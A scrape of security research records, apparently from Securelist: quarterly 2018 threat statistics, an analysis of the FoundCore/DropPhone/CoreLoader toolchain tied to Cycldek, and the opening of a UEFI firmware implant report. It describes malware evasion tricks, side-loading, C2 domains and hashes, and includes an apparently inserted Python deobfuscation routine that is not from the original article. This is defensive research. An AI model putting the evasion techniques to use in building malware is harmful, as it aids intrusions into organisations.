| 3 | Nepal | 2.18 |
| 4 | Pakistan | 1.41 |
| 5 | India | 1.27 |
| 6 | Indonesia | 1.21 |
| 7 | Vietnam | 1.20 |
| 8 | Mozambique | 1.06 |
| 9 | China | 1.05 |
| 10 | Kazakhstan | 0.84 |

_* Countries with relatively few Kaspersky Lab users (under 50,000) are excluded._
_** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in that country._

Most of the places in this rating are occupied by Asian countries. Bangladesh tops the list with 5.8%, followed by Uzbekistan (3.77%) and the newcomer Nepal (2.18%) in third. Pakistan (1.41%) came fourth, while China (1.05%) fell from sixth to ninth and Vietnam (1.20%) fell four places to seventh.

**TOP 10 most widespread cryptor families**

| # | Name | Verdicts | %* |
|---|---|---|---|
| 1 | WannaCry | Trojan-Ransom.Win32.Wanna | 28.72% |
| 2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 13.70% |
| 3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 12.31% |
| 4 | Cryakl | Trojan-Ransom.Win32.Cryakl | 9.30% |
| 5 | (generic verdict) | Trojan-Ransom.Win32.Gen | 2.99% |
| 6 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 2.58% |
| 7 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 2.33% |
| 8 | Shade | Trojan-Ransom.Win32.Shade | 1.99% |
| 9 | Crysis | Trojan-Ransom.Win32.Crusis | 1.70% |
| 10 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 1.70% |

_* Unique Kaspersky Lab users attacked by a specific family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._

The leading 10 places are increasingly occupied by generic verdicts, suggesting widespread cryptors are effectively detected by automatic intelligent systems. WannaCry (28.72%) still leads the way among specific cryptoware families. This quarter saw two new versions of the Trojan GandCrab (12.31%) emerge, meaning it remained in the most widespread ransomware rating. Among the old-timers that remained in the TOP 10 were PolyRansom, Cryakl, Shade, and Crysis, while Cerber and Purgen failed to gain much distribution this quarter.

## Cryptominers

_As we already reported in [Ransomware and malicious cryptominers in 2016-2018](<https://securelist.com/ransomware-and-malicious-crypto-miners-in-2016-2018/86238/>), ransomware is gradually declining and being replaced with cryptocurrency miners. Therefore, this year we decided to start publishing quarterly reports on the status of this type of threat. At the same time, we began using a broader range of verdicts as a basis for collecting statistics on miners, so the statistics in this year's quarterly reports may not be consistent with the data from our earlier publications._

### Statistics

#### Number of new modifications

In Q3 2018, Kaspersky Lab solutions detected 31,991 new modifications of miners.

_Number of new miner modifications, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151750/it-threat-evolution-q3-2018-statistics_15_en.png>)

#### Number of users attacked by cryptominers

In Q3, Kaspersky Lab products detected mining programs on the computers of 1,787,994 KSN users around the world.

_Number of unique users attacked by cryptominers, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151816/it-threat-evolution-q3-2018-statistics_16_en.png>)

Cryptomining activity in September was comparable to that of June 2018, though we observed an overall downward trend in Q3.

#### Geography of attacks

_Geography of cryptominers, Q3 2018 (download)_

**TOP 10 countries by percentage of attacked users**

| # | Country* | %** |
|---|---|---|
| 1 | Afghanistan | 16.85% |
| 2 | Uzbekistan | 14.23% |
| 3 | Kazakhstan | 10.17% |
| 4 | Belarus | 9.73% |
| 5 | Vietnam | 8.96% |
| 6 | Indonesia | 8.80% |
| 7 | Mozambique | 8.50% |
| 8 | Ukraine | 7.60% |
| 9 | Tanzania | 7.51% |
| 10 | Azerbaijan | 7.13% |

_* Countries with relatively few Kaspersky Lab product users (under 50,000) are excluded._
_** Unique Kaspersky Lab users whose computers were targeted by miners as a percentage of all unique users of Kaspersky Lab products in the country._

## Vulnerable apps used by cybercriminals

The distribution of platforms most often targeted by exploits showed very little change from Q2. Microsoft Office applications (70%) are still the most frequently targeted – five times more than web browsers, the second most attacked platform.

Although quite some time has passed since security patches were released for the two vulnerabilities most often used in cyberattacks – CVE-2017-11882 and CVE-2018-0802 – the exploits targeting the Equation Editor component still remain the most popular for sending malicious spam messages.

An exploit targeting the vulnerability [CVE-2018-8373](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8373>) in the VBScript engine (which was patched in late August) was detected in the wild and affected Internet Explorer 9–11. However, we are currently observing only limited use of this vulnerability by cybercriminals. This is most probably due to Internet Explorer not being very popular, as well as the fact that VBScript execution is disabled by default in recent versions of Windows 10.

_Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151232/it-threat-evolution-q3-2018-statistics_18.png>)

Q3 was also marked by the emergence of two atypical 0-day vulnerabilities – [CVE-2018-8414](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8414>) and [CVE-2018-8440](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8440>).
They are peculiar because information about the existence of these vulnerabilities, along with detailed descriptions and all the files required to reproduce them, was leaked to the public domain long before official patches were released for them.\n\nIn the case of CVE-2018-8414, [an article](<https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39>) was published back in June with a detailed description of how SettingContent-ms files can be used to execute arbitrary code in Windows. However, the security patch to fix this vulnerability was only released in Q3, one month after the article became publicly available and active exploitation of the vulnerability had already begun. The researchers who described this technique reported it to Microsoft, but initially it was not recognized as a vulnerability requiring a patch. Microsoft reconsidered after cybercriminals began actively using these files to deliver malicious payloads, and a patch was released on July 14. According to KSN statistics, the SettingContent-ms files didn't gain much popularity among cybercriminals, and after the security patch was released, their use ceased altogether. \n\nAnother interesting case was the CVE-2018-8440 vulnerability. Just like in the case above, all the information required for reproduction was deliberately published by a researcher, and threat actors naturally took advantage. CVE-2018-8440 is a privilege-escalation vulnerability, allowing an attacker to escalate their privileges in the system to the highest level \u2013 System. The vulnerability is based on how Windows processes a task scheduler advanced local procedure call (ALPC). The vulnerable ALPC procedure makes it possible to change the discretionary access control list (DACL) for files located in a directory that doesn't require special privileges to access. 
To escalate privileges, the attacker exploits the vulnerability in the ALPC to change access rights to a system file, and then that system file is overwritten by an unprivileged user. \n\n## Attacks via web resources\n\n_The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are created by cybercriminals, while web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries where online resources are seeded with malware\n\n_The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks. In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn the third quarter of 2018, Kaspersky Lab solutions blocked **947,027,517** attacks launched from web resources located in 203 countries around the world. **246,695,333** unique URLs were recognized as malicious by web antivirus components.\n\n_Distribution of web attack sources by country, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151845/it-threat-evolution-q3-2018-statistics_19_en.png>)\n\nIn Q3, the USA (52.81%) was home to most sources of web attacks. 
Overall, the leading four sources of web attacks remained unchanged from Q2: the USA is followed by the Netherlands (16.26%), Germany (6.94%) and France (4.4%).\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered in each country during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by _malware-class_ malicious programs; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | %** \n---|---|--- \n1 | Venezuela | 35.88 \n2 | Albania | 32.48 \n3 | Algeria | 32.41 \n4 | Belarus | 31.08 \n5 | Armenia | 29.16 \n6 | Ukraine | 28.67 \n7 | Moldova | 28.64 \n8 | Azerbaijan | 26.67 \n9 | Kyrgyzstan | 25.80 \n10 | Serbia | 25.38 \n11 | Mauritania | 24.89 \n12 | Indonesia | 24.68 \n13 | Romania | 24.56 \n14 | Qatar | 23.99 \n15 | Kazakhstan | 23.93 \n16 | Philippines | 23.84 \n17 | Lithuania | 23.70 \n18 | Djibouti | 23.70 \n19 | Latvia | 23.09 \n20 | Honduras | 22.97 \n \n_* Countries with relatively few Kaspersky Lab users (under 10,000) are excluded._ \n_** Unique users targeted by malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 18.92% of internet users' computers worldwide experienced at least one _malware-class_ web attack.\n\n_Geography of malicious web attacks in Q3 2018 _ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151916/it-threat-evolution-q3-2018-statistics_20_en.png>)\n\n## Local threats\n\n_Local infection statistics for user computers are an important indicator: they reflect threats that have penetrated computer systems by infecting files or 
via removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. Analysis takes account of the malicious programs identified on user computers or on removable media connected to computers \u2013 flash drives, camera memory cards, phones and external hard drives._\n\nIn Q3 2018, Kaspersky Lab's file antivirus detected **239,177,356** unique malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating includes only malware-class attacks. 
It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | %** \n---|---|--- \n1 | Uzbekistan | 54.93 \n2 | Afghanistan | 54.15 \n3 | Yemen | 52.12 \n4 | Turkmenistan | 49.61 \n5 | Tajikistan | 49.05 \n6 | Laos | 47.93 \n7 | Syria | 47.45 \n8 | Vietnam | 46.07 \n9 | Bangladesh | 45.93 \n10 | Sudan | 45.30 \n11 | Ethiopia | 45.17 \n12 | Myanmar | 44.61 \n13 | Mozambique | 42.65 \n14 | Kyrgyzstan | 42.38 \n15 | Iraq | 42.25 \n16 | Rwanda | 42.06 \n17 | Algeria | 41.95 \n18 | Cameroon | 40.98 \n19 | Malawi | 40.70 \n20 | Belarus | 40.66 \n \n_* Countries with relatively few Kaspersky Lab users (under 10,000) are excluded._ \n_** Unique users on whose computers **malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country._\n\n_Geography of local malware attacks in Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151949/it-threat-evolution-q3-2018-statistics_21_en.png>)\n\nOn average, 22.53% of computers globally faced at least one malware-class local threat in Q3.", "cvss3": {}, "published": "2018-11-12T10:00:55", "type": "securelist", "title": "IT threat evolution Q3 2018. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802", "CVE-2018-8373", "CVE-2018-8414", "CVE-2018-8440"], "modified": "2018-11-12T10:00:55", "id": "SECURELIST:2E379BD626ECA8E38B18EDCA6CD22F3C", "href": "https://securelist.com/it-threat-evolution-q3-2018-statistics/88689/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-04-06T10:30:44", "description": "\n\n## Introduction\n\nIn the nebula of Chinese-speaking threat actors, it is quite common to see tools and methodologies being shared. 
One such example of this is the infamous "DLL side-loading triad": a legitimate executable, a malicious DLL to be [sideloaded](<https://attack.mitre.org/techniques/T1574/002/>) by it, and an encoded payload, generally dropped from a self-extracting archive. Initially considered to be the signature of LuckyMouse, we observed other groups starting to use similar "triads" such as HoneyMyte. While it implies that it is not possible to attribute attacks based on this technique alone, it also follows that efficient detection of such triads reveals more and more malicious activity.\n\nThe investigation described in this article started with one such file which caught our attention due to the various improvements it brought to this well-known infection vector.\n\n## FoundCore Loader\n\nThis malware sample was discovered in the context of an attack against a high-profile organization located in Vietnam. From a high-level perspective, the infection chain follows the expected execution flow:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06085101/Cycldek_01.jpg>)\n\nAfter being loaded by a legitimate component from Microsoft Outlook (FINDER.exe, MD5 [9F1D6B2D45F1173215439BCC4B00B6E3](<https://opentip.kaspersky.com/9F1D6B2D45F1173215439BCC4B00B6E3/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)), outlib.dll (MD5 [F267B1D3B3E16BE366025B11176D2ECB](<https://opentip.kaspersky.com/F267B1D3B3E16BE366025B11176D2ECB/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)) hijacks the intended execution flow of the program to decode and run a shellcode placed in a binary file, rdmin.src (MD5 [DF46DA80909A6A641116CB90FA7B8258](<https://opentip.kaspersky.com/DF46DA80909A6A641116CB90FA7B8258/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)). Such shellcodes that we had seen so far, however, did not involve any form of obfuscation. 
So, it was a rather unpleasant surprise for us when we discovered the first instructions:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/01140032/Cycldek_02.png>)\n\nExperienced reverse-engineers will immediately recognize disassembler-desynchronizing constructs in the screenshot above. The conditional jumps placed at offsets 7 and 9 appear to land in the middle of an address (as evidenced by the label loc_B+1), which is highly atypical for well-behaved assembly code. Immediately after, we note the presence of a call instruction whose destination (highlighted in red) is identified as bogus by IDA Pro, and the code that follows doesn't make any sense.\n\nExplaining what is going on requires taking a step back and providing a bit of background about how disassemblers work. At the risk of oversimplifying, flow-oriented disassemblers make a number of assumptions when processing files. One of them is that, when they encounter a conditional jump, they start disassembling the "false" branch first, and come back to the "true" branch later on. This process is better evidenced by looking at the opcodes corresponding to the code displayed above, again starting from offset 7:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/01140052/Cycldek_03.png>)\n\nIt is now more obvious that there are two ways to interpret the code above: the disassembler can either start from "E8", or from "81" \u2013 by default, IDA will choose the latter: E8 is in fact the opcode for the call instruction. But astute readers will notice that "JLE" (jump if lower or equal) and "JG" (jump if greater) are opposite conditions: no matter what, one of those will always be true and as such the actual code, as seen by the CPU during the execution, will start with the byte "81". 
Such constructs are called [opaque predicates](<https://en.wikipedia.org/wiki/Opaque_predicate>), and this E8 byte in the middle was only added there in order to trick the disassembler.\n\nDefeating this trick is but a trivial matter for IDA Pro, as it is possible to manually correct the disassembling mistake. However, it was immediately obvious that the shellcode had been processed by an automated obfuscation tool. Opaque predicates, sometimes in multiples, and dead code were inserted between every single instruction of the program. In the end, cleaning up the program automatically was the only practical approach, and we did so by modifying an [existing script](<https://github.com/RolfRolles/FinSpyVM/>) for the FinSpy malware family created by the respected reverse-engineer Rolf Rolles.\n\nThis step allowed us to discover the shellcode's purpose: to decrypt and decompress the final payload, using a combination of RC4 and LZNT1. Even then, it turned out that the attackers had more tricks up their sleeve. Normally, at this stage, one would have expected to find a PE file that the shellcode would load into memory. But instead, this is what we got:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/01140315/Cycldek_04.png>) \nThe recovered file was indeed a PE, but it turned out that most of its headers had been scrubbed. In fact, even the scarce ones remaining contained incoherent values \u2013 for instance, here, a number of declared sections equal to 0xAD4D. Since it is the shellcode (and not the Windows loader) that prepares this file for execution, it doesn't matter that some information, such as the magic numbers, is missing. 
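The complementary-jump construct described above (JLE and JG to the same address, with a junk byte in between that only the disassembler sees) can be recognized and neutralized mechanically. The following Python routine is an added example for this post; it is not code from the Securelist authors nor from the FinSpy script by Rolf Rolles that they adapted. It generalizes the JLE/JG pair in the screenshot to any pair of complementary short conditional jumps (opcodes 0x70 to 0x7F, whose complement differs only in the low bit) that share one forward target, and overwrites the whole construct with NOPs so that a linear disassembler resynchronizes at the real instruction. The byte string it runs on is constructed for the example, including the `sub esp, 0x100` that stands in for the real instruction starting with 0x81.

```python
"""Strip the complementary-jump opaque predicate described above.

Added example, not code from the Securelist post or from the FinSpy script
by Rolf Rolles that the post adapts. It runs on a constructed byte string.

Construct (offsets from the post's screenshot, relative to its start):
    7E 03    jle  +3   -> lands at start+5
    7F 01    jg   +1   -> lands at start+5
    E8       junk byte the CPU never reaches; a linear disassembler
             decodes it as the start of a 5-byte CALL and desynchronizes
Exactly one of JLE/JG is always taken, so execution resumes at start+5.
Replacing the whole construct with NOPs keeps the semantics (neither the
jumps nor NOP modify flags or registers) and lets the disassembler resync.
"""
from __future__ import annotations

NOP = 0x90


def _rel8(b: int) -> int:
    """Interpret one byte as a signed 8-bit jump displacement."""
    return b - 256 if b >= 0x80 else b


def find_opaque_predicates(code: bytes) -> list[tuple[int, int]]:
    """Return (start, end) spans of complementary short-jump pairs.

    Short conditional jumps use opcodes 0x70..0x7F, and the complement of a
    condition differs only in the low bit (JE 74 / JNE 75, JLE 7E / JG 7F).
    A complementary pair with the same forward target is always taken, so
    the bytes between the second jump and that target are never executed.
    """
    spans = []
    i, n = 0, len(code)
    while i + 3 < n:
        op1, op2 = code[i], code[i + 2]
        if 0x70 <= op1 <= 0x7F and op2 == (op1 ^ 1):
            t1 = i + 2 + _rel8(code[i + 1])  # target of the first jump
            t2 = i + 4 + _rel8(code[i + 3])  # target of the second jump
            if t1 == t2 and i + 4 < t1 <= n:  # same target, forward, in range
                spans.append((i, t1))
                i = t1                        # resume at the real code
                continue
        i += 1
    return spans


def strip_opaque_predicates(code: bytes) -> tuple[bytes, list[tuple[int, int]]]:
    """Overwrite every detected construct (both jumps plus junk) with NOPs."""
    patched = bytearray(code)
    spans = find_opaque_predicates(code)
    for start, end in spans:
        patched[start:end] = bytes([NOP]) * (end - start)
    return bytes(patched), spans


# Constructed sample: a tiny function with two predicates inserted, the
# second one using the mirrored JG/JLE order.
SAMPLE = bytes.fromhex(
    "55"            # push ebp
    "89e5"          # mov  ebp, esp
    "7e037f01e8"    # jle +3 / jg +1 / junk E8   (the post's construct)
    "81ec00010000"  # sub  esp, 0x100            (real code, starts with 81)
    "7f037e01e8"    # jg +3 / jle +1 / junk E8   (mirrored order)
    "31c0"          # xor  eax, eax
    "c9"            # leave
    "c3"            # ret
)

if __name__ == "__main__":
    clean, found = strip_opaque_predicates(SAMPLE)
    for start, end in found:
        print(f"opaque predicate at 0x{start:x}..0x{end:x}: {SAMPLE[start:end].hex()}")
    print("patched:", clean.hex())
```

Scanning at every byte offset, as this does, can match immediates or data that happen to look like a jump pair; when cleaning a real shellcode one would run the same check only at instruction boundaries reported by a disassembler. The NOP fill is chosen over deleting the bytes because it leaves every other offset (and so every relative jump and call elsewhere) untouched.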
As for the erroneous values, it turned out that the shellcode was fixing them on the fly using hardcoded operations:\n \n \n for ( i = 0; ; ++i ) // Iterate on the sections\n {\n // [...]\n // Stop when all sections have been read\n if ( i >= pe->pe_header_addr->FileHeader.NumberOfSections - 44361 )\n break;\n // [...]\n }\n\nFor instance, in the decompiled code above (as for all references to the file's number of sections) the value read in the headers is subtracted by 44361. For the attackers, the advantage is two-fold. First, it makes acquiring the final payload statically a lot more difficult for potential reverse-engineers. Second, it also ensures that the various components of the toolchain remain tightly coupled to each other. If only a single one of them finds itself uploaded to a multi-scanner website, it will be unexploitable for defenders. This is a design philosophy that we had observed from the LuckyMouse APT in the past, and is manifest in other parts of this toolchain too, as we will see later on. Eventually, we were able to reconstruct the file's headers and move on with our analysis \u2013 but we found this loader so interesting from an educational standpoint that we decided to base one track of our online reverse-engineering course on it. For more detailed steps on how we approached this sample, please have a look at [Targeted Malware Reverse Engineering](<https://xtraining.kaspersky.com/courses/targeted-malware-reverse-engineering>).\n\n## FoundCore payload\n\nThe final payload is a remote administration tool that provides full control over the victim machine to its operators. 
Upon execution, this malware starts 4 threads:\n\n * The first one establishes persistence by creating a service.\n * The second one sets inconspicuous information for the service by changing its "Description", "ImagePath", "DisplayName" fields (among others).\n * The third sets an empty DACL (corresponding to the SDDL string "D:P") on the image file associated with the current process in order to prevent access to the underlying malicious file.\n * Finally, a worker thread bootstraps execution and establishes a connection with the C2 server. Depending on its configuration, it may also inject a copy of itself into another process.\n\nCommunications with the server can take place either over raw TCP sockets encrypted with RC4, or via HTTPS. Commands supported by FoundCore include filesystem manipulation, process manipulation, screenshot captures and arbitrary command execution.\n\n## RoyalRoad documents, DropPhone and CoreLoader\n\nTaking a step back from the FoundCore malware family, we looked into the various victims we were able to identify to try to gather information about the infection process. In the vast majority of the incidents we discovered, it turned out that FoundCore executions were preceded by the opening of malicious RTF documents downloaded from static.phongay[.]com. They were all generated using [RoyalRoad](<https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper>) and attempt to exploit CVE-2018-0802.\n\nInterestingly, while we would have expected them to contain decoy content, all of them were blank. 
We, therefore, hypothesize the existence of precursor documents, possibly delivered through spear-phishing, or precursor infections, which would trigger the download of one of these RTF files.\n\nSuccessful exploitation leads to the deployment of yet another malware that we named DropPhone:\n\n**MD5** | 6E36369BF89916ABA49ECA3AF59D38C6 \n---|--- \n**SHA1** | C477B50AE66E7228164930117A7D36C53713A5F2 \n**SHA256** | F50AE4B25B891E95B57BD4391AEB629437A43664034630D593EB9846CADC9266 \n**Creation time** | 2020-11-04 09:14:22 \n**File type** | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows \n**File size** | 56 KB \n \nThis C++ implant also comes in the form of a legitimate executable (DeElevate.exe, from the publisher StarDock) and a side-loaded DLL (DeElevator.dll). At this stage, we are left with more questions than answers when it comes to it. DropPhone fetches a file saved as data.dat from hxxps://cloud.cutepaty[.]com, but we were unable to obtain a copy of this file so far. Next, it expects to find a companion program in %AppData%\\Microsoft\\Installers\\sdclt.exe, and will eventually terminate execution if it cannot find it.\n\nOur hypothesis is that this last file could be an instance or variant of CoreLoader (which we will describe in a minute), but the only piece of data supporting this theory that we have at our disposal is that we found CoreLoader in this folder in a single occurrence.\n\nDropPhone launches sdclt.exe, then collects environment information from the victim machine and sends it to DropBox. The last thing this implant does is delete data.dat without ever accessing its contents. 
We speculate that they are consumed by sdclt.exe, and that this is another way to lock together the execution of two components, frustrating the efforts of the reverse-engineers who are missing pieces of the puzzle \u2013 as is our case here.\n\n**MD5** | 1234A7AACAE14BDD94EEE6F44F7F4356 \n---|--- \n**SHA1** | 34977E351C9D0E9155C6E016669A4F085B462762 \n**SHA256** | 492D3B5BEB89C1ABF88FF866D200568E9CAD7BB299700AA29AB9004C32C7C805 \n**Creation time** | 2020-11-21 03:47:14 \n**File type** | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows \n**File size** | 66 KB \n \nFinally, CoreLoader, the last malware we found associated with this set of activity, is a simple shellcode loader which performs anti-analysis and loads additional code from a file named WsmRes.xsl. Again, this specific file eluded our attempts to catch it, but we suspect it to be, one way or another, related to FoundCore (described in the previous section).\n\nOverall, our current understanding of this complex toolchain is as follows. Dashed lines represent the components and links we are inferring, striped boxes represent the files we could not acquire.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06091732/Cycldek_06.jpg>)\n\n## Victimology and attribution\n\nWe observed this campaign between June 2020 and January 2021. According to our telemetry, dozens of organizations were affected. 80% of them are based in Vietnam and belong to the government or military sector, or are otherwise related to the health, diplomacy, education or political verticals. We also identified occasional targets in Central Asia and in Thailand.\n\nFor the reasons laid out in the introduction, attribution based on tooling alone is risky when it comes to this nebula. At first glance, the use of a "triad", the general design philosophy and the obvious effort spent to make reverse-engineering as complex as possible are reminiscent of LuckyMouse. 
However, we also observed code similarities between CoreLoader or FoundCore and programs associated with the Cycldek threat actor \u2013 namely, RedCore Loader (MD5: [1B6BCBB38921CAF347DF0A21955771A6](<https://opentip.kaspersky.com/1B6BCBB38921CAF347DF0A21955771A6/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)).\n\nWhile Cycldek has so far been considered one of the less sophisticated threat actors from the Chinese-speaking nexus, its targeting is known to be consistent with what we observed in this campaign. Therefore, we are linking the activities described in this post with Cycldek with low confidence.\n\n## Conclusion\n\nNo matter which group orchestrated this campaign, it constitutes a significant step up in terms of sophistication. The toolchain presented here was willfully split into a series of interdependent components that function together as a whole. Single pieces are difficult \u2013 sometimes impossible \u2013 to analyze in isolation, because they rely on code or data provided at other stages of the infection chain. We regretfully admit that this strategy was partly successful in preventing us from obtaining a complete picture of this campaign. As such, this report is as much about the things we know as it is about figuring out what we don't. We hereby extend our hand to fellow researchers who might be seeing other pieces of this vast puzzle, because we strongly believe that the challenges ahead of us can only be overcome through information sharing among trusted industry partners.\n\nSome readers from other regions of the world might dismiss this local activity as irrelevant to their interests. We would advise them to take heed. Experience shows that regional threat actors sometimes widen their area of activity as their operational capabilities increase, and that tactics or tools are widely shared across distinct actors or intrusion-sets that target different regions. Today, we see a group focused on South-East Asia taking a major leap forward. 
Tomorrow, they may decide they're ready to take on the whole world.\n\n## Indicators of Compromise\n\n**File Hashes**\n\n[F267B1D3B3E16BE366025B11176D2ECB](<https://opentip.kaspersky.com/F267B1D3B3E16BE366025B11176D2ECB/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | FoundCore malicious DLL (outllib.dll) \n---|--- \n[DF46DA80909A6A641116CB90FA7B8258](<https://opentip.kaspersky.com/DF46DA80909A6A641116CB90FA7B8258/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | FoundCore companion file (rdmin.src) \n[6E36369BF89916ABA49ECA3AF59D38C6](<https://opentip.kaspersky.com/6E36369BF89916ABA49ECA3AF59D38C6/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | DropPhone \n[60095B281E32DAD2B58A10005128B1C3](<https://opentip.kaspersky.com/60095B281E32DAD2B58A10005128B1C3/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | Malicious RTF document \n[1234A7AACAE14BDD94EEE6F44F7F4356](<https://opentip.kaspersky.com/1234A7AACAE14BDD94EEE6F44F7F4356/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | CoreLoader \n \n**Domains**\n\n[phong.giaitrinuoc[.]com](<https://opentip.kaspersky.com/phong.giaitrinuoc.com/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | FoundCore C2 \n---|--- \n[cloud.cutepaty[.]com](<https://opentip.kaspersky.com/cloud.cutepaty.com/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | DropPhone C2 \n[static.phongay[.]com](<https://opentip.kaspersky.com/static.phongay.com/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | RTF document stager", "cvss3": {}, "published": "2021-04-05T10:00:22", "type": "securelist", "title": "The leap of a Cycldek-related threat actor", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-0802"], "modified": "2021-04-05T10:00:22", "id": "SECURELIST:E9DB961C0B1E8B26B305F963059D717E", "href": "https://securelist.com/the-leap-of-a-cycldek-related-threat-actor/101243/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-07T09:55:20", "description": "\n\n[ Part II. 
Technical details (PDF)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/07080558/MosaicRegressor_Technical-details.pdf>)\n\nUEFI (or Unified Extensible Firmware Interface) has become a prominent technology that is embedded within designated chips on modern-day computer systems. Replacing the legacy BIOS, it is typically used to facilitate the machine's boot sequence and load the operating system, while using a feature-rich environment to do so. At the same time, it has become the target of threat actors to carry out exceptionally persistent attacks.\n\nOne such attack has become the subject of our research, where we found a compromised UEFI firmware image that contained a malicious implant. This implant served as a means to deploy additional malware on the victim computers, one that we haven't come across thus far. To the best of our knowledge, this is the second known public case where malicious UEFI firmware in use by a threat actor was found in the wild.\n\nThroughout this blog we will elaborate on the following key findings:\n\n * We discovered rogue UEFI firmware images that were modified from their benign counterpart to incorporate several malicious modules;\n * The modules were used to drop malware on the victim machines. 
This malware was part of a wider malicious framework that we dubbed MosaicRegressor;\n * Components from that framework were discovered in a series of targeted attacks pointed towards diplomats and members of an NGO from Africa, Asia and Europe, all showing ties in their activity to North Korea;\n * Code artefacts in some of the framework's components and overlaps in C&C infrastructure used during the campaign suggest that a Chinese-speaking actor is behind these attacks, possibly having connections to groups using the Winnti backdoor;\n\nThe attack was found with the help of [Firmware Scanner](<https://www.kaspersky.com/enterprise-security/wiki-section/products/anti-rootkit-and-remediation-technology>), which has been integrated into Kaspersky products since the beginning of 2019. This technology was developed to specifically detect threats hiding in the ROM BIOS, including UEFI firmware images.\n\n## Current State of the Art\n\nBefore we dive deep into our findings, let us have a quick recap of what UEFI is and how it was leveraged for attacks thus far. In a nutshell, UEFI is a specification that constitutes the structure and operation of low-level platform firmware, so as to allow the operating system to interact with it at various stages of its activity.\n\nThis interaction happens most notably during the boot phase, where UEFI firmware facilitates the loading of the operating system itself. That said, it can also occur when the OS is already up and running, for example in order to update the firmware through a well-defined software interface.\n\nConsidering the above, UEFI firmware makes for a perfect mechanism of persistent malware storage. A sophisticated attacker can modify the firmware in order to have it deploy malicious code that will be run after the operating system is loaded. 
